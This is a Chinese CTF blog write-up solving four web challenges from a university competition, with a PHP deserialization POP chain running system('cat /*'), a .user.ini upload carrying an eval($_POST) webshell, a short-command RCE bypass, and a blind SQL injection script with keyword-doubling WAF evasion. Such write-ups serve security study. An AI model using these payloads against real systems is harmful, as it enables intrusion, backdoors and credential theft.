<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.2.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/luo.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/luo.jpg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <link rel="manifest" href="/manifest.json">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"luokuang1.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":true,"show_result":true,"style":"mac"},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideDownBigOut"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="石能为鼓知识点：php反序列化 首先通过查看源代码发现source.php文件  访问得题目的源码：  1234567891011121314151617181920212223&lt;?phpshow_source(__FILE__);class ping &#123;  protected $xiang;  function __construct() &#123;	$this-&gt;xia">
<meta property="og:type" content="article">
<meta property="og:title" content="武功山杯·湘赣边大学生网络安全竞赛部分题解">
<meta property="og:url" content="https://luokuang1.github.io/2024/07/28/%E6%AD%A6%E5%8A%9F%E5%B1%B1%E6%9D%AF%C2%B7%E6%B9%98%E8%B5%A3%E8%BE%B9%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="luokuang的博客">
<meta property="og:description" content="石能为鼓知识点：php反序列化 首先通过查看源代码发现source.php文件  访问得题目的源码：  1234567891011121314151617181920212223&lt;?phpshow_source(__FILE__);class ping &#123;  protected $xiang;  function __construct() &#123;	$this-&gt;xia">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://luokuang1.github.io/images/t1.png">
<meta property="og:image" content="https://luokuang1.github.io/images/t2.png">
<meta property="og:image" content="https://luokuang1.github.io/images/t3.png">
<meta property="og:image" content="https://luokuang1.github.io/images/t4.png">
<meta property="article:published_time" content="2024-07-28T08:24:31.000Z">
<meta property="article:modified_time" content="2025-02-19T15:00:11.595Z">
<meta property="article:author" content="luokuang">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://luokuang1.github.io/images/t1.png">


<link rel="canonical" href="https://luokuang1.github.io/2024/07/28/%E6%AD%A6%E5%8A%9F%E5%B1%B1%E6%9D%AF%C2%B7%E6%B9%98%E8%B5%A3%E8%BE%B9%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3%E5%A4%8D%E7%8E%B0/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://luokuang1.github.io/2024/07/28/%E6%AD%A6%E5%8A%9F%E5%B1%B1%E6%9D%AF%C2%B7%E6%B9%98%E8%B5%A3%E8%BE%B9%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3%E5%A4%8D%E7%8E%B0/","path":"2024/07/28/武功山杯·湘赣边大学生网络安全竞赛部分题解复现/","title":"武功山杯·湘赣边大学生网络安全竞赛部分题解"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>武功山杯·湘赣边大学生网络安全竞赛部分题解 | luokuang的博客</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="luokuang的博客" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">luokuang的博客</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-links"><a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9F%B3%E8%83%BD%E4%B8%BA%E9%BC%93"><span class="nav-number">1.</span> <span class="nav-text">石能为鼓</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%BE%99%E6%B1%A0%E5%8F%A4%E5%BA%99"><span class="nav-number">2.</span> <span class="nav-text">龙池古庙</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9C%9F%E5%90%9B%E6%93%92%E9%BE%99"><span class="nav-number">3.</span> <span class="nav-text">真君擒龙</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%A6%85%E8%95%B4%E6%9D%A8%E5%B2%90"><span class="nav-number">4.</span> <span class="nav-text">禅蕴杨岐</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="luokuang"
      src="/images/luo.jpg">
  <p class="site-author-name" itemprop="name">luokuang</p>
  <div class="site-description" itemprop="description">沉淀，还得继续沉淀</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">18</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://luokuang1.github.io/2024/07/28/%E6%AD%A6%E5%8A%9F%E5%B1%B1%E6%9D%AF%C2%B7%E6%B9%98%E8%B5%A3%E8%BE%B9%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3%E5%A4%8D%E7%8E%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/luo.jpg">
      <meta itemprop="name" content="luokuang">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="luokuang的博客">
      <meta itemprop="description" content="沉淀，还得继续沉淀">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="武功山杯·湘赣边大学生网络安全竞赛部分题解 | luokuang的博客">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          武功山杯·湘赣边大学生网络安全竞赛部分题解
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2024-07-28 16:24:31" itemprop="dateCreated datePublished" datetime="2024-07-28T16:24:31+08:00">2024-07-28</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2025-02-19 23:00:11" itemprop="dateModified" datetime="2025-02-19T23:00:11+08:00">2025-02-19</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="石能为鼓"><a href="#石能为鼓" class="headerlink" title="石能为鼓"></a>石能为鼓</h2><p>知识点：php反序列化</p>
<p>首先通过查看源代码发现source.php文件</p>
<p><img src="https://luokuang1.github.io/images/t1.png" width="40%" height="30%"></p>
<p>访问得题目的源码：</p>
<blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">show_source(__FILE__);</span><br><span class="line">class ping &#123;  </span><br><span class="line">protected $xiang;  </span><br><span class="line">function __construct() &#123;</span><br><span class="line">	$this-&gt;xiang = new fun(); </span><br><span class="line">    &#125;  </span><br><span class="line">function __destruct() &#123;</span><br><span class="line">    $this-&gt;xiang-&gt;cp();  </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class fun &#123;  </span><br><span class="line">function cp() &#123;    </span><br><span class="line">    echo &quot;hello&quot;;  </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class cup &#123;  </span><br><span class="line">    private $data;  </span><br><span class="line">    function cp() &#123;    </span><br><span class="line">       eval($this-&gt;data);  </span><br><span class="line">       &#125;</span><br><span class="line">&#125;</span><br><span class="line">unserialize($_GET[&#x27;d&#x27;]);</span><br></pre></td></tr></table></figure>
</blockquote>
<p>就是一个简单的序列化题，只不过在反序列化中有一个特性，将原来属性的修饰符修改是不会影响反序列化的结果，所以在构造pop链的时候可以将原来的属性修饰符进行修改，便于赋值与序列化</p>
<p>最终的pop链为：</p>
<blockquote>
<p>&lt;?php </p>
<p>class ping{</p>
<p>public $xiang;</p>
<p>}</p>
<p>class cup{</p>
<p>public $data=”system(‘cat /*’);”;</p>
<p>}</p>
<p>$a=new ping();</p>
<p>$a-&gt;xiang=new cup();</p>
<p>echo serialize($a);</p>
<p>//输出：O:4:”ping”:1:{s:5:”xiang”;O:3:”cup”:1:{s:4:”data”;s:17:”system(‘cat /*’);”;}}</p>
</blockquote>
<p>得flag</p>
<p><img src="https://luokuang1.github.io/images/t2.png" width="40%" height="30%"></p>
<h2 id="龙池古庙"><a href="#龙池古庙" class="headerlink" title="龙池古庙"></a>龙池古庙</h2><p>知识点：文件上传(.user.ini文件)</p>
<p>该题目有提示信息，通过上传.user.ini文件</p>
<p>简单描述一下.user.ini文件的应用，.user.ini和.htaccess一样是目录的配置文件，.user.ini就是用户自定义的一个php.ini，我们可以利用这个文件来构造后门和隐藏后门</p>
<p>常见的用法就是通过上传一个.user.ini文件在通过一个php文件来配合使用构成一个后门</p>
<p>.user.ini文件的内容入下：</p>
<blockquote>
<p>auto_prepend_file=.user.ini</p>
<p>#&lt;?php @eval($_POST[‘a’]);?&gt;</p>
</blockquote>
<p>这个的作用相当于一个文件包含，将.user.ini的文件包含该目录下所有php文件</p>
<p>这里的题目需要前端绕过，最后的结果:</p>
<p><img src="https://luokuang1.github.io/images/t3.png" width="40%" height="30%"></p>
<p>再通过访问该目录下的index.php，通过蚁剑连接寻找flag即可</p>
<h2 id="真君擒龙"><a href="#真君擒龙" class="headerlink" title="真君擒龙"></a>真君擒龙</h2><p>知识点：rce</p>
<p>先通过查看源码，发现了一个source.php文件，访问得源码：</p>
<blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">show_source(__FILE__);</span><br><span class="line">$cmd=$_GET[&#x27;cmd&#x27;];</span><br><span class="line">if(isset($cmd)&amp;&amp;strlen($cmd)&lt;6&amp;&amp;!strpos(strtolower($cmd), &#x27;nl&#x27;))&#123;  </span><br><span class="line">   system($cmd);</span><br><span class="line">&#125;else&#123; </span><br><span class="line">   die(&quot;no!no!no!&quot;);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>
</blockquote>
<p>这是一个限制长度的rce,并且将nl过滤了，但是又一个命令也是同样的简短od命令,以二进制形式读取文件，通过控制它的参数来控制返回文件是以几进制的形式，默认为八进制</p>
<p>具体为<code>od /*</code> 读取的内容为：</p>
<blockquote>
<p>0000000 066146 063541 033573 061464 033465 031142 026546 034541 0000020 032070 032055 032063 026470 061141 031143 063055 030461 0000040 061460 032145 032542 061143 076462 000012 0000053</p>
</blockquote>
<p>其中又七位或者六位的数，七位的数为偏移量，在具体解码的时候可以不用管，许多的网上的八进制解码都有问题，可以通过下面的python脚本来实现解码：</p>
<blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">print(b&#x27;&#x27;.join(int(ss, 8).to_bytes(2, &#x27;little&#x27;) for ss in s.split()))</span><br></pre></td></tr></table></figure>
</blockquote>
<p>s为去除偏移量的八进制数</p>
<p><img src="https://luokuang1.github.io/images/t4.png" width="40%" height="30%"></p>
<h2 id="禅蕴杨岐"><a href="#禅蕴杨岐" class="headerlink" title="禅蕴杨岐"></a>禅蕴杨岐</h2><p>知识点：sql注入，布尔盲注</p>
<p>开局只有一个输入框，进行万能密码测试没有用</p>
<blockquote>
<p> 1’or 1=1#</p>
<p> ‘^0#</p>
</blockquote>
<p>开始进行扫描，得到.index.php.swp文件，打开后的源码：</p>
<blockquote>
<p>&lt;?php<br>function contain($str, $a){<br>    $strpos_res = strpos($str, $a);<br>    if ($strpos_res){<br>        return true;<br>    }<br>    return false;<br>}</p>
<p>function lvlarrep($str, $v1){<br>    $s = str_ireplace($v1, ‘’, $str);<br>    if (contain($s, $v1)){<br>        $s = lvlarrep($s, $v1);<br>    }<br>    return $s;<br>}</p>
<p>function waf($str){<br>    $ban_str = explode(‘,’,’select,ascii,sub,con,alter table,delete ,drop ,update ,insert into,load_file,/<em>,</em>/,union,&lt;script,&lt;/script,sleep(,outfile,eval(,user(,phpinfo(),select*,union%20,sleep%20,select%20,delete%20,drop%20,and%20’);<br>    foreach($ban_str as $v1){<br>        if (contain($str, $v1)){<br>            $s = lvlarrep($str, $v1);<br>            $str = $s;<br>        }<br>    }<br>    $str = str_replace(‘\’’, ‘&#39;’, $str);    // 万恶的单引号，必须转义<br>    return $str;<br>}</p>
<p>if (isset($_POST[‘login’])){<br>    $db_host = ‘127.0.0.1’;<br>    $db_user = ‘root’;<br>    $db_pass = ‘toor’;<br>    $db_name = ‘ctf’;</p>
<p>$conn = mysqli_connect($db_host, $db_user, $db_pass, $db_name);<br>if (!$conn) {<br>    die(‘数据库连接失败！’ . mysqli_connect_error());<br>}</p>
<p>$username = waf($_POST[‘username’]);<br>$password = waf($_POST[‘password’]);<br>$sql = “SELECT * FROM user WHERE <code>username</code> = ‘$username’ AND <code>password</code> = ‘$password’;”;</p>
<p>$query_result = mysqli_query($conn, $sql);<br>if (mysqli_num_rows($query_result) &gt; 0) {<br>    die(‘登陆成功！’);<br>}else{<br>    die(‘哦欧！’);<br>}</p>
<p>}<br>?&gt;</p>
</blockquote>
<p>源码的主要信息就是通过将 ‘ 进行了过滤，以及将关键词替空，所以关键词可以通过复写的方式来绕过</p>
<p>对于单引号闭合的问题可以通过 \ 来进行转义，在与后面的 ‘ 来进行闭合</p>
<blockquote>
<p><code>username</code> =’$username’ AND <code>password</code> = ‘$password’;”;</p>
<p>上传username=1\&amp;password=or 2&gt;1#&amp;login=1  放到源码中就可以实现这样的效果</p>
<p>让$username前面的单引号和$password前面的单引号进行闭合，再注释后面的单引号来实现注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">url = &quot;http://59.62.61.30:48708/&quot;</span><br><span class="line">result = &quot;&quot;</span><br><span class="line">for i in range(1,100):</span><br><span class="line">    l = 33</span><br><span class="line">    r =130</span><br><span class="line">    mid = (l + r) &gt;&gt; 1</span><br><span class="line">    while(l&lt;r):</span><br><span class="line">       payload=&#123;</span><br><span class="line">           &quot;username&quot;:&quot;1\\&quot;,</span><br><span class="line">           #&quot;password&quot;:&#x27;or 0^((selconect asconcii(suconbstring(group_counionncat(table_name),&#123;0&#125;,1)) from information_schema.tables where table_schema=database())&gt;&#123;1&#125;)#&#x27;.format(i,mid),</span><br><span class="line">          # &quot;password&quot;: &#x27;or 0^((selconect asconcii(suconbstring(group_counionncat(column_name),&#123;0&#125;,1)) from information_schema.columns where table_name=&quot;user&quot;)&gt;&#123;1&#125;)#&#x27;.format(i, mid),</span><br><span class="line">           &quot;password&quot;: &#x27;or 0^((selconect asconcii(suconbstring(group_counionncat(password),&#123;0&#125;,1)) from user)&gt;&#123;1&#125;)#&#x27;.format(i, mid),</span><br><span class="line">           &quot;login&quot;:&quot;1&quot;</span><br><span class="line">       &#125;</span><br><span class="line">       html = requests.post(url,data=payload)</span><br><span class="line">       #print(payload)</span><br><span class="line">       if &#x27;登陆成功&#x27; in html.text:</span><br><span class="line">          l = mid+1</span><br><span class="line">       else:</span><br><span class="line">          r = mid</span><br><span class="line">       mid = (l+r)&gt;&gt;1</span><br><span class="line">    if(chr(mid)==&quot;!&quot;):</span><br><span class="line">       result = result + chr(mid)</span><br><span class="line">       break</span><br><span class="line">    result = result + chr(mid)</span><br><span class="line">    print(result)</span><br></pre></td></tr></table></figure>
</blockquote>
<p>最后通过二分法来获取flag</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/ctf/" rel="tag"># ctf</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/07/23/%E6%B5%85%E8%B0%88ctf%E4%B8%AD-htaccess%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E7%9A%84%E8%BF%90%E7%94%A8/" rel="prev" title="浅谈ctf中.htaccess配置文件的运用">
                  <i class="fa fa-angle-left"></i> 浅谈ctf中.htaccess配置文件的运用
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/07/31/java%E5%8F%8D%E5%B0%84%E4%B8%8EDNSlog%E9%93%BE/" rel="next" title="java反射与DNSlog链">
                  java反射与DNSlog链 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">luokuang</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>




    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
